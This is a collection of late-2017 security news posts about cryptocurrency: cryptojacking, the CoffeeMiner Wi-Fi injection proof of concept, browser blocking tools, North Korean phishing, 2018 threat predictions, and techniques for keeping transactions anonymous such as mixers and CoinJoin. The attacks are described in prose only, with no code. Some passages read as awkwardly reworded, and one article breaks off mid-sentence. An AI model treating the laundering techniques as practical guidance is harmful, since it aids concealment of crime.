Creators of some monero-mining software argue that in-program (browser) mining can have a true blue use, letting people intentionally exchange computer power for access to articles, videos, or premium application features, when sites are looking past publicizing or advertising as an income and revenue stream. "I don't agree with anybody's computer being mishandled or abused without their insight," says Spagni, the monero core developer.

"However the technology that is being manhandled presents a completely new approach for monetizing a service on the web." He contends this could empower a "free" version of Netflix or provide another subsidizing stream for journalism.

Coinhive one of the most well-known web miners, even offers a mining-based captcha alternative, aimed at making it less attainable for spammers to play out specific activities on a website, and a version of the software called AuthedMine which requires the users to unequivocally opt in before mining begins. Makers of other mining tools put forth comparable expressions about user consent, maybe with changing degrees of sincerity.

Nevertheless a tool called Monero Quiet Excavator, available for $14, mines in the background on Windows PCs. It doesn't launch a visible window that users can recognize or detect as fast as possible, keeps the gadgets from going into sleep mode, and can "bypass firewalls," as indicated by its website. In any case, its developer states that it is intended just for "legitimate users". Those could incorporate individuals who possess various PCs and need to utilize them to mine monero "transparently for the end user or client of the PC"

CoffeeMiner PoC Targets Public Wi-Fi Networks to Mine for Cryptocurrency

A recently published proof-of-concept notes that it could be possible for attackers to hijack coffee shop Wi-Fi networks and get connected users to mine cryptocurrencies, according to software developer Arnau Code.

A couple of weeks back, an incident involving a Starbucks coffee shop having their customers mining for cryptocurrency – it seems the internet service provider that offered Wi-Fi connectivity was at fault – so it seems attackers physically in the coffee shop could hijack the network. Arnau pulled off the proof-of-concept by performing a man-in-the-middle attack that involved redirecting all customers through his proxy by performing an ARP-spoofing attack, then injecting a single line of code into visited HTML pages that calls the cryptocurrency miner in the victim’s browser.

“The objective is to have a script that performs autonomous attack on the WiFi network,” wrote Arnau. “It’s what we have called CoffeeMiner, as it’s a kind of attack that can be performed in the cafes WiFi networks”

Although the attack requires the cybercriminal to actually be present in the coffee shop and have a strong enough Wi-Fi antenna so that it can hijack traffic from as many clients as possible, the attack does seem plausible, provided the targeted router or switch lacks built-in ARP-spoofing protection.

Leveraging the same CoinHive cryptocurrency mining JavaScript used by The Pirated Bay or some rogue Google Chrome extensions, Arnau does point out that, for the mining to yield positive results, the victim needs to visit the affected website for more than 40 seconds per session.

“CoinHive miner makes sense when user stays in a websit for mid-long term sessions. So, for example, for a website where the users average session is around 40 seconds, it doesn’t make much sense,”
reads the blog post. “In our case, as we will inject the crypto miner in each one of the HTML pages that victims request, will have long term sessions to calculate hashes to mine Monero.”

The developer suggests that adding more automation to his proof-of-concept could increase its effectivness, although the project has been tagged “for academic purposes only”.

Bitcoin loses ground; hackers opt for other encrypted digital currencies

Bitcoin’s popularity is waning as alternatives such as Stellar, ZCash or monero climb the cybercriminals’ preferred list. Hackers are switching to other cryptocurrencies that law enforcement may be less familiar with, so chances of detecting crime or money laundering related transactions decrease. ZCash and monero, for example, allegedly bring better encryption and privacy features to the table.

“The two most well-known cryptocurrencies are considered too expensive for most new entrants. Despite being able to purchase a fraction of each, there is a real psychological barrier around owning something in its entirety,” explained for CNBC Dave Chapman, managing director at trading house Octagon Strategy.

At a total value of more than $750 billion, bitcoin covers 36 percent of the cryptocurrency market, leaving plenty of room for others like litecoin, ethereum, ripple, dash and monero to grow in market capitalization. Bitcoin’s market share dropped from last month’s 56 percent, while ethereum’s share has tripled.

“With the Ethereum blockchain reaching 1 million transactions per day, and both Ethereum and other blockchain projects frequently reaching their full transaction capacity, the need for scaling progress is becoming more and more clear and urgent,” announced ethereum founder Vitalik Buter.

As a result, “two experimental subsidy schemes” will be started to “tie into and improve Ethereum’s scalability.”

Even Dogecoin, a new cryptocurrency created as a joke, has grown in popularity, reaching a market cap of over $1 billion in January.

According to Bloomberg, analytic firms are paying more attention to transactions and are improving techniques to detect illicit activity and transactions.

“The altcoins today, in large part, are not trying to be bitcoin competitors,” said Lex Sokolin, global director of fintech strategy at Autonomous Research LLP in London. “They are doing something else entirely — ethereum as a smart-contracts platform, iota as a machine-economy token, ripple for interbank payments, and so on.” Their use “should become increasingly relevant as the novelty of crypto wears off.”

Opera Offers First Built-In Cryptojacking Protection Tool

Browser-makers are finally starting to fight back against the bitcoin mining threat. According to ZDNet, the beta version of Opera 50 is the first major browser to offer a built-in mechanism that blocks cryptojacking, a new form of malware that leverages the victim’s computer to mine cryptocurrency without permission.

The new antimining tool, called NoCoin, is part of the ad blocker function in Opera. It is disabled by default but can be enabled through the Settings or Preferences page. According to an Opera blog post, the tool blocks cryptocurrency mining scripts just as an ad blocker would disable banner ads and pop-ups.

The Danger of Cryptojacking

Without a tool such as NoCoin, a cryptocurrency miner might go undetected until the central processing unit (CPU) usage dramatically increased for no obvious reason, preventing the victim from executing his or her own programs.

Coinhive was the first such malware to hit the web in September, Bleeping Computer reported. The JavaScript code mines for Monero using the victim’s CPU resources. It was initially presented as a way for site owners to bypass the need to display ads for revenue. Pirate Bay was one of the first to use Coinhive for this purpose, but the torrent site removed it in response to user outcry.

Researchers have also observed attempts to hide JavaScript cryptominers using covert pop-under windows, ZDNet reported. This enables fraudsters to continue using the victim’s CPU even after the user has navigated away from the website. Some crafty criminals even integrated JavaScript miner scripts right into their fake security warning browser lock screens.

Dusting for Fingerprints

Another Bleeping Computer article reported that Google has already looked at the service for its Chrome browser, but has rejected the idea of blacklisting or fingerprinting this kind of JavaScript action. The technology giant believes that a malware-laden site could easily mutate the script to bypass this mechanism.

While specific extensions can be added to browsers to help users avoid cryptomining, Opera’s built-in functionality makes this protection readily available.

The post Opera Offers First Built-In Cryptojacking Protection Tool appeared first on Security Intelligence.

CEO of Major UK-Based Cryptocurrency Exchange Kidnapped in Ukraine

Pavel Lerner, a prominent Russian blockchain expert and known managing director of one of the major crypto-exchanges EXMO, has allegedly been kidnapped by "unknown" criminals in the Ukranian capital of Kiev. According to Ukraine-based web publication Strana, Lerner, 40-year-old citizen of Russia, was kidnapped on December 26 when he was leaving his office in the center of town (located on the

Wall Street warming up to Bitcoin as Goldman Sachs sets up trading desk

Investment firm Goldman Sachs Group is about to dip a toe into the Bitcoin market, according to people familiar with the bank’s strategy. Bitcoin is heavily associated with cybercrime – in particular ransomware.

Goldman Sachs is setting up a trading desk to create markets in digital currencies, Bloomberg reports, citing two people with knowledge of the firm’s long-term plans.

“In response to client interest in digital currencies, we are exploring how best to serve them,” firm spokesman Michael DuVally told the news agency.

Goldman Sachs has set its sights on Bitcoin, risky but potentially extremely profitable crypto currency that has captured the imagination of the world, including hackers. Cybercriminals love crypto currencies for one major advantage: anonymity.

The proliferation of ransomware – currently the #1 cyberthreat – was made possible partially thanks to digital currencies. After encrypting a victim’s computer, cyber crooks leave their Bitcoin wallet’s address on the screen demanding ransom be paid at that address in the form of cryptocurrency. While the public can see the wallet and its contents, no one knows who owns it.

Other popular “altcoins” (as they are collectively called) include Monero, Ethereum, Litecoin and Zcash – each with their respective valuation and unique pros and cons. However, no altcoin is more valuable than Bitcoin, currently trading at around $14,000 apiece.

But because it isn’t backed by any real assets, and because it is a cybercrime currency, Bitcoin is also highly volatile – making it a very risky affair for Wall Street. Just last week, Bitcoin peaked at an impressive $20,000 per coin.

Also worth noting, several cryptocurrency concerns have fallen victim to cyberattacks. NiceHash, the self-proclaimed “largest crypto-mining marketplace” lost $60 million to hackers earlier this month.

Perhaps not surprisingly then, banks like Citigroup and Bank of America have taken a wait-and-see approach.

Top Five Trends IT Security Pros Need to Think About Going into 2018

It’s that time of the year when we look back at the tech trends of 2017 to provide us with a hint of things to come. Accordingly, let’s engage in our favorite end-of-year pastime: predictions about the coming year.

Equipped with Imperva’s own research, interactions with our customers, and a wealth of crowdsourcing data analyzed from installations around the world, we’ve looked ahead to the future of cybersecurity and compiled a few significant trends IT security pros can expect to see in 2018.

Here are our top five predictions for 2018 and what you can do to prepare for them:

1. Massive Cloud Data Breach

Companies have moved to cloud data services faster than anticipated even in traditional industries like banking and healthcare where security is a key concern. As shown in Figure 1, take-up of cloud computing will continue to increase, attaining a compound annual growth rate (CAGR) of 19%, from $99B in 2017 to $117B in 2018.

In 2018, in parallel with the take-up of cloud computing, we’ll see massive cloud data breaches—primarily because companies are not yet fully aware of the complexities involved with securing cloud data.

growth of cloud computing - IDC

Figure 1: Rapid Growth of Cloud Computing (Source: IDC)

Data Breaches: A Troubling Past, A Worrying Future

It is estimated that in 2017 alone, over 99 billion records were exposed because of data breaches. Of the various circumstances behind the breaches, hacking of IT systems is by far the most prevalent cause, followed by poor security, inside jobs, and lost or stolen hardware and media.

Major breaches at healthcare and financial services companies indicate a growing trend of vulnerabilities and exploits in these two vital business sectors.

Healthcare was one of the hardest hit sectors in 2017, and that trend is expected to worsen in the coming year. Some 31 million records were stolen, accounting for 2% of the total and up a whopping 423% from just 6 million.

The financial services industry is the most popular target for cyber attackers (see Figure 2), and this dubious distinction is likely to continue in the upcoming year. Finance companies suffered 125 data breaches, 14% of the total, up 29% from the previous six months.

Data breaches in various other industries totaled 53, up 13% and accounting for 6% of the total. The number of records involved in these attacks was a staggering 1.34 billion (71% of the total) and significantly up from 14 million.

It is estimated that the average cost of a data breach will be over $150 million by 2020, with the global annual cost forecast to be $2.1 trillion.

data records stolen or lost top five sectors - IDC

Figure 2: Data Records Stolen or Lost by Sector (Source: IDC)

Critical Cloud-based Security Misconfigurations

Missteps in cloud-based security configurations often lead to data breaches. This is likely to increase as more organizations move some or most of their operations to the cloud.

As organizations and business units migrate to public cloud services, centralized IT departments will find it increasingly difficult to control their company’s IT infrastructure. These enterprises lack the visibility necessary to manage their cloud environments and don’t have the monitoring tools to detect and report on security governance and compliance. Many are not even aware of the specific workloads they’ve migrated to the cloud. And without a doubt, you can’t secure what you can’t see.

For example, an unsecured Amazon Web Services S3 storage bucket has been an ongoing concern for cloud users. The bucket, which can be configured to allow public access, has in the past leaked highly sensitive information. In one instance of a major security breach, a whopping 111 GB worth was exposed, affecting tens of thousands of consumers.

Most significantly, Amazon is aware of the security issue, but is not likely to mitigate it since it is caused by cloud-user misconfigurations.

2. Cryptocurrency Mining

We expect to see a growth of cryptocurrency mining attacks where attackers are utilizing endpoint resources (CPU/GPU) to mine cryptocurrency either by cross-site scripting (XSS) or by malware. It’s increasingly likely that remotely vulnerable/hackable IoT devices will also be used as a mining force to further maximize an attacker’s profits.

Illegal mining operations set up by insiders, which can be difficult to detect, are also on the rise—often carried out by employees with high-level network privileges and the technical skills needed to turn their company’s computing infrastructure into a currency mint.

These attacks will quickly grow in popularity given their lucrative nature. As long as there is a potential windfall involved, such inside jobs are likely to remain high on the list of cybersecurity challenges faced by companies.

Although attacks that attempt to embed crypto-mining malware are currently unsophisticated, we expect to see an increase in the sophistication of attacks as word gets out that this is a lucrative enterprise. We also expect these attacks to target higher-traffic websites, since the potential to profit increases greatly with higher numbers of concurrent site visitors.

3. Malicious Use of AI/Deception of AI Systems

The malicious use of artificial intelligence (AI) will continue to grow quickly. The industry has started to see early traces of attackers leveraging AI to learn normal behavior and mimic that behavior to bypass current user and entity behavior analytics (UEBA) solutions. It’s still very early stage and will continue to mature beyond 2018. However, it will force current UEBA vendors to come up with a 2.0 approach to identifying anomalous behavior.

AI and internet of things (IoT) use cases drive cloud adoption. Artificial intelligence in the cloud promises to be the next great disrupter as computing is evolving from a mobile-first to an artificial intelligence-first model. The proliferation of cloud-based IoT in the marketplace continues to drive cloud demand, as cloud allows for secure storage of massive amounts of structured and unstructured data central to IoT core functions.

Without proper awareness and security measures, AI can be easily fooled by adversarial behavior. In 2018 we will see more:

  • Attacks on AI systems (for example, self-driving cars)
  • Cyber attackers who adapt their attacks to bypass AI-based cybersecurity systems

4. Cyber Extortion Targets Business Disruption

Cyber extortion will be more disruption focused. Encryption, corruption, and exfiltration will still be the leaders in cyber extortion, but disruption will intensify this year, manifesting in disabled networks, internal network denials of service, and crashing email services.

In the last few years, attackers have adopted a “traditional” ransomware business model—encrypt, corrupt or exfiltrate the data and extort the owner in order to recover the data or prevent it from leaking. Fortunately, techniques such as deception or machine learning have helped to prevent these types of attacks and made it more difficult for attackers to successfully complete a ransomware attack.

From a cost perspective, most of the damage associated with ransomware attacks is not the data loss itself, since many firms have backups, but the downtime. Often in the case of ransomware, attackers will start to leverage a disrupt-and-extort method. DDoS is the classic and most familiar one, but attackers will probably adopt new techniques. Examples include shutting down an internal network (web app to a database, point-of-sale systems, communication between endpoints, etc.), modifying computer configuration to cause software errors, causing software crashes, system restarts, disruption of your corporate email or disruption of any other infrastructure which is mandatory for an organization’s employees and/or customers day-to-day functions. Basically, any event that leaves the company unable to conduct business.

While absolute protection is impossible, you can help lower your chance of business interruption due to a cyber-attack. Start by creating a formal, documented risk management plan that addresses the scope, roles, responsibilities, compliance criteria and methodology for performing cyber risk assessments. This plan should include a characterization of all systems used at the organization based on their functions, the data they store and process, and their importance to the organization.

5. Breach by Insiders

Businesses are relying more on data which means more people within the business have access to it. The result is a corresponding increase in data breaches by insiders either through intentional (stealing) or unintentional (negligent) behavior of employees and partners.

While the most sensational headlines typically involve infiltrating an ironclad security system or an enormous and well-funded team of insurgents, the truth of how hackers are able to penetrate your system is more boring: it’s your employees.

A new IT security report paints a bleak picture of the actual gravity of the situation. Researchers found that IT workers in the government sector overwhelmingly think that employees are actually the biggest threat to cybersecurity. In fact, 100% of respondents said so.

Fortunately, security-focused companies have begun identifying these traditionally difficult to detect breaches using data monitoring, analytics, and expertise. The difference being that in 2018, more companies will invest in technology to identify this behavior where previously they were blind.

In fact, 75% of IT employees in government reported that rather than their organization having dedicated cybersecurity personnel on staff (which is becoming more and more necessary with each passing year), an overworked IT team was left to deal with security and employee compliance. As a result, 57% reported that they didn’t even have enough time to implement stronger security measures while 54% cited too small of a budget.

Here’s another fact for you: insider threats are the cause of the biggest security breaches out there, and they are very costly to remediate. According to a 2017 Insider Threat Report, 53% of companies estimate remediation costs of $100,000 and more, with 12% estimating a cost of more than $1 million. The same report suggests that 74% of companies feel that they are vulnerable to insider threats, with seven percent reporting extreme vulnerability.

These are the steps every company should take to minimize insider threats:

  • Background checks
  • Watch employee behavior
  • Use the principle of least privilege
  • Control user access
  • Monitor user actions
  • Educate employees

Insider threats are one of the top cybersecurity threats and a force to be reckoned with. Every company will face insider-related breaches sooner or later regardless of whether it is caused by a malicious action or an honest mistake. And it’s much better to put the necessary security measures in place now than to spend millions of dollars later.

 

Join Imperva on January 23rd for a live webinar where we’ll discuss these trends in more detail and review the security measures necessary to mitigate the risks. Register to attend today.

North Korea hackers steal bitcoin by targeting currency insiders

Bitcoin values are skyrocketing, and North Korea appears to be trying to profit from that virtual gold rush. Secureworks reports that the Lazarus Group (a team linked to the North Korean government) has been conducting a spearphishing campaign against cryptocurrency industry workers in a bid to steal bitcoin. The attacks have tried to trick workers into compromising their computers by including a seemingly innocuous Word file that claims they need to enable editing to see the document. If they fell prey, it installed a rogue macro that quietly loaded a PC-hijacking trojan while staffers were busy looking at the bogus document.

Source: ZDNet, Reuters

Cryptocurrency in kilowatt hours: Counting the costs of anonymous transactions

The energy costs are not the only charges in a transaction: the bitcoin network itself levies a charge which, according to a blog from Valve, the gaming provider behind the Steam network, has skyrocketed from $0.20 in 2016 to $20 per transaction today

The post Cryptocurrency in kilowatt hours: Counting the costs of anonymous transactions appeared first on WeLiveSecurity

Staying Anonymous on the Blockchain: Concerns and Techniques

With Bitcoin at one point valued at more than $5,000 per unit, cryptocurrencies have excited a lot of interest from individuals, businesses, and hackers. One of the selling points of Bitcoin and others of its type is anonymity. Yet there are concerns that online currency transactions may not be as anonymous as many wish. In this post, we will discuss several tools that make an effort to ensure anonymity with cryptocurrency transactions.

A cryptocurrency is a digital currency in which encryption techniques regulate the generation of units of currency and verify the transfer of funds, and that operates independently of a central bank. In other words, it is a decentralized, trustless money system that can be verified independent of any central authority. It does this using a “blockchain,” a list of open yet encrypted records.

There are several flavors of cryptocurrencies, with Bitcoin, Litecoin, and Ethereum the most widely used. Cryptocurrencies released after the success of Bitcoin are collectively called altcoins. The father of all cryptocurrencies, Bitcoin requires the ledger, or record of transactions, to be available to everyone—making all transactions public knowledge. For many, this raises anonymity and privacy concerns. In this article, we will examine some of the ways that the anonymity of cryptocurrencies has been addressed.

Because a blockchain ledger is public, maintaining anonymity is hard, especially in the case of Bitcoin. Bitcoin is considered pseudoanonymous, which means a person may be linked to a public Bitcoin address, but not to an actual name or home address. You may know that an address is related to one person but you do not know to whom. Hence, Bitcoin (and most cryptocurrencies) are not completely anonymous. Many people trading in cryptocurrency prefer their transactions to be anonymous for various reasons. These include, but are not limited to, law enforcement–related issues, company-specific information, or for the sake of maintaining privacy. In the hacker world, cryptocurrencies have become ubiquitous in financial transactions. Well-known underground markets that sell stolen personal data, malware, and other goods and services deal exclusively in cryptocurrencies.

Figure 1: The AlphaBay market, which was seized by law enforcement.

Primarily, these markets deal in Bitcoin, as was the case with the recently seized Hansa and AlphaBay markets. Other currencies are also being used and implemented in these markets. According to the European Cybercrime Centre Internet Organised Crime Threat Assessment report, many markets, including automated vending card sites, deal almost exclusively in Bitcoins. However, the report acknowledges that Monero, Etheruem, and Zcash are also gaining traction in these circles. It also notes the development of a new dark-net market called Tralfamadore, which uses Ethereum smart contracts as a possible new crime-as-a-service model.

Cryptocurrencies are not limited to markets. Extortion attempts through ransomware demand cryptocurrencies as payment. All the modern major ransomware families—such as Locky, Petya, and Wannacry—have demanded Bitcoin for payments. To protect proprietary information, among other reasons, those engaged in cybercrime and those who investigate these crimes have an incentive to maintain anonymity.

Maintaining anonymity can be difficult because of mistakes or attacks against the network designed to deanonymize users. Compromised identities can hinder law enforcement investigations or, in the case of cybercriminals, lead to arrest. Because the ledger is publicly visible, anyone can analyze it to correlate addresses with identifiable names. If they are successful, they can link all transactions to a payer or payee. The attacker can then move to corresponding Bitcoin addresses and perform a “taint” analysis. In Bitcoin jargon, the “taint” of a Bitcoin transaction evaluates the association between an address and earlier transaction addresses. The more taint, the stronger the link between two addresses. Hence the need for various techniques to maintain anonymity.

A deceptively simple technique is to refrain from given out personally identifiable information. Users can avoid linking their personal data or organizational information to the cryptocurrency address or transaction. A website generally has personal data such as an IP address and registrar information that give context to the address if used in relation to the site or service. Another easy and obvious way to maintain anonymity is to trade Bitcoins in cash.

Anonymity is based on the trust of the person or organization you are trading with and how securely they store the information. Most law abiding users may feel comfortable using ATMs and even wallets with built-in features for in-person exchanges such as the BillBoard feature of Mycelium. However, some local laws view in-person cash transactions as evidence of money laundering and can lead to arrest, depending on the amount transferred.

Beyond simple user-behavior changes, many technologies help secure anonymity for cryptocurrency users. We will delve into several techniques:

  • Services such as virtual private networks (VPNs) or Tor
  • New Bitcoin addresses for each transaction
  • Tumblers/mixers
  • CoinJoin
  • Secure wallets
  • Stealth addresses
  • TumbleBit
  • CryptoNote
  • Zcash or other anonymity-centric cryptocurrencies

Services such as VPNs or Tor

Both VPN and Tor services are designed to safeguard the user and can be used to maintain anonymity. These technologies are used by researchers, journalists, companies, governments, and others for both safety and privacy. They are also used by many cryptocurrency users with similar concerns. Many ransomware decryption-management tools are housed as hidden services in Tor. VPNs are often used to hide personal information during cryptocurrency transaction requests. Both VPN and Tor can hide the personal data of the user making a transaction by using a different IP address or geo location, sometimes configurable by the user. These tools will prevent an attacker or analyst from monitoring traffic from correlating IP addresses and transactions. It can also be used when communicating to others, such as vendors, and hiding your address from them as well.

Figure 2: The onion router network.

Tor is free software that enables anonymity in online transactions by “onion routing,” an encryption technique in the application layer that essentially masks IP addresses. It does this routing through hops, similar to layers of an onion, multiple times over a virtual network, making it hard for any member of the hops to decrypt information. Using Tor can slow Bitcoin transactions but it can keep the user’s address hidden.

A VPN helps add security to a network by using secure protocols such as PPTP, L2TP, or OpenVPN to encapsulate online transactions. A user trading in Bitcoins can use a VPN to appear to work from San Francisco while actually working from Germany. The data is encrypted from the user to the VPN service, hiding traffic from their ISP, and preventing correlating traffic analysis of transactions.

New Bitcoin Addresses for Each Transaction

The blockchain is effectively immutable, provided that 50% or more of the network is not working together to make changes. Effectively, all transactions can be traced to their inception. For users who use different addresses for each transaction, it becomes difficult to prove associations between each address. However, by reusing addresses, the connection is inherently known. Users will allow any third party to easily follow transactions to and from that address. Their behavior is easy to follow. Should their identity become associated with their addresses, further analysis of its context may lead to the discovery of other related addresses used by the same user. By using unique addresses for each transaction, users increase the difficulty of finding relationships among the transactions. The use of single addresses per transaction is the recommended practice from Satoshi Nakamoto’s original paper.

Tumblers/Mixers

The terms tumblers and mixers are often used interchangeably. They are services that help confuse the trail of cryptocurrency transactions by associating unrelated funds together using various methods.

If an address’ anonymity has been compromised or, in other words, has been tainted, the funds can be “cleaned” using a tumbler. The association between the user’s identity and the new addresses can be muddled, providing a new start to anonymity. The mixer cannot undue any information gained prior to the mix. To do this, users send the Bitcoins they want to “clean” to the tumbler, which mixes them with Bitcoins from other users in a pool and then returns the currency to their respective owners at new addresses, minus a mixing fee.

There are two types of mixers, centralized and decentralized. Popular centralized mixers are Bitmixer.IO (in use since 2011), Bitcoin Fog (since 2011, under Tor), and Helix. Decentralized mixers obtain the same mixing goals without a central authority controlling the mixings. Examples of decentralized Bitcoin mixers are CoinShuffle, JoinMarket, SharedCoin, and Jumblr. This technique is obviously of interest to money launderers. Bitcoin Fog appears to focus on those users. Mixing services are seen to have a lot of privacy and anonymity value by other coin developers and have benefitted from a lot of recent research and implementations. New or proposed coin implementations such as CloakcoinDash through PrivateSend, PIVX, and Zcoin have built-in mixing services as a part of their blockchain networks.

Figure 3: Bitcoin Fog, a Bitcoin mixer.

CoinJoin

The back-end technology of decentralized mixers is typically the widely used technology CoinJoin, which was proposed in 2013 by Gregory Maxwell. The basic concept groups a bunch of payers, pools their money, and makes a joint payment, thus obfuscating the relationship between payer and payee. What makes CoinJoin possible is that not every input in a transaction must come from the same wallet or user. The signatures required to authenticate a transaction are independent for each input, allowing multiple users to agree to complete a single transaction to multiple unrelated payees. In doing so, the information about which input paid which payee is not part of the blockchain, and can be hidden from analysis.

CoinJoin is an important technology for maintaining anonymity because it is the base of many techniques and implementations. Some implementations include SharedCoins, Darkwallet, CoinShuffle, PrivateSend, and JoinMarket.

 

Figure 4: A CoinJoin example. Source: Wikipedia.

Secure Wallets

Bitcoin wallets contain a private key that provides ownership and access to the wallets’ funds. They generate addresses and sign their transactions, proving ownership to the blockchain network. If a private key is compromised, any address generated by that private key will be compromised as well, along with any funds that those addresses may hold. Users are strongly advised to protect their private keys through secure wallets. Broadly speaking, there are five types of wallets: desktop, mobile, web, paper, and hardware. Among the different types some, such as Darkwallet, also focus on user anonymity. Darkwallet primarily provides anonymity using two techniques: stealth addresses and CoinJoin. By implementing several anonymity techniques and providing a mechanism for users to join in CoinJoin transactions, wallets simplify the process. Darkwallet is still in open beta, and it is unclear how active the project is.

 

Figure 5: Darkwallet.

Stealth Addresses

Stealth addresses facilitate transactions in which a requester wishes to both ask for funds from the public yet keep their balance hidden. The requester publishes a stealth address that can be used to generate a regular address. Using cryptographic techniques, all generated stealth addresses are owned by the requester’s private key. With this technique, the payment addresses are not publicly associated with the receiver, preventing analysts from tracking the ownership of funds.

Stealth addresses work using the elliptic curve Diffie-Hellman algorithm. This is the idea behind Monero, which inherently supports stealth addresses. This privacy feature is attractive to many customers in the digital currency market. However, it can be applied to other currencies, too, including Bitcoin. For example, Darkwallet uses stealth addresses as one feature to provide anonymity within Bitcoin transactions.

TumbleBit

TumbleBit is a new protocol that can be used with Bitcoin to make transactions that are off the blockchain via an untrusted intermediary party. It essentially is a trustless mixing system using the blind-signing features of Chaumium e-cash. To keep the mixer from linking the payer and payee, the system uses a pool of funds that are indistinguishable from each other. The funds are populated by the senders, who send a “blinded” serial number to the mixer, who signs it. Based on the properties of blind signing, any signed serial number can be unblended and still maintain a valid signature. This serial can be sent to the recipient, who can redeem the associated funds. The mixer does not know which funds are associated with the signed serial number and deducts the appropriate amount from the pool. When a large number of similar input and output addresses are mixed in, it is hard for the mixer to map transactions to the payer and payee, even with extensive analysis.

Figure 6: TumbleBit.

It takes a three-phased approach to complete payments. In the first phase, escrow, Party A notifies the tumbler that they would like to make a payment, and Party B notifies the tumbler that they would like to be paid. This is done on the public blockchain. For the second phase, the researchers have put cryptographic tools into place that allow the tumbler to pay the correct parties without actually knowing which parties are involved. This is the blind-signing technique. Phase two does not appear on the blockchain, providing additional benefits such as faster transactions. In the third phase, cashout, all of the transactions are conducted simultaneously, making it more difficult to identify which parties are involved in any specific transaction. Phase three does appear in the public blockchain.

CryptoNote

A ring signature is a type of digital signature that allows one person in a group to endorse the signature on behalf of the group. This step provides more security by making it computationally hard to determine which of the group members’ keys was used to produce the signature. CryptoNote uses ring signatures to produce untraceable payments and is implemented in cryptocurrencies such as Monero. CryptoNote makes it almost impossible for the verifier of the payment to identify the payee from the group.

Figure 7: A ring signature.

CryptoNote uses a modified version of the Diffie-Hellman exchange protocol, which allows two parties to produce a common secret key derived from their public keys. In some implementations, the sender uses the receiver’s public address and random date generated by the user to create a one-time key for the payment. Because the keys are generated dynamically and are random, they are called one-time keys. A ring signature also can transform traceability into linkability, which is supported by using a key image through which it is impossible to recover the private key. The key image is a one-way function that acts as an anonymous marker for the user’s private key.

Zcash or Other Anonymity-Centric Cryptocurrencies

Some cryptocurrencies were developed with anonymity as a primary goal. Monero, as well as Dash, Zcash, and others are among them. Each implement different techniques to hide the identity of its users. We will look at just Zcash, but there are many alternatives with many approaches.

Zcash is a proof-of-work cryptocurrency, and is considered the first truly anonymous digital currency. Zcash also uses a decentralized approach on the blockchain; however, users can encrypt all transactions on the blockchain, making it hard for anybody on the network to access the details. Zcash uses the technology zk-Snarks (zero-knowledge Snarks) to facilitate the encryption. Moreover, the only information that is available on the blockchain is the timestamp of transactions. Zcash is regarded as a privacy-enabling cryptocurrency but most people agree it is also anonymous. Users are free to use two kinds of addresses, transparent addresses, which start with a “t” and make trades similar to those in Bitcoin, and shielded addresses, which start with “z” and use zero-knowledge proofs to maintain privacy.

 

Figure 8: Zcash.

 

Many of the technologies and techniques to maintain anonymity have grown from mathematicians, technologists, and enthusiastic cryptocurrency researchers, who have made many advancements and practical use of their findings. Although there are valid reasons to seek anonymity, in the hands of bad actors these techniques make it difficult for law enforcement and security researchers to analyze. Regardless of the motivations, many users try to maintain anonymity while using cryptocurrencies. There are several options, some of which can be combined for further security. A few techniques are simple, while others require specialized tools.

In future posts, will we cover some of the tools and techniques used to break the anonymity of users of cryptocurrencies.

 

For more insights and research follow us at @McAfee_Labs.

The post Staying Anonymous on the Blockchain: Concerns and Techniques appeared first on McAfee Blogs.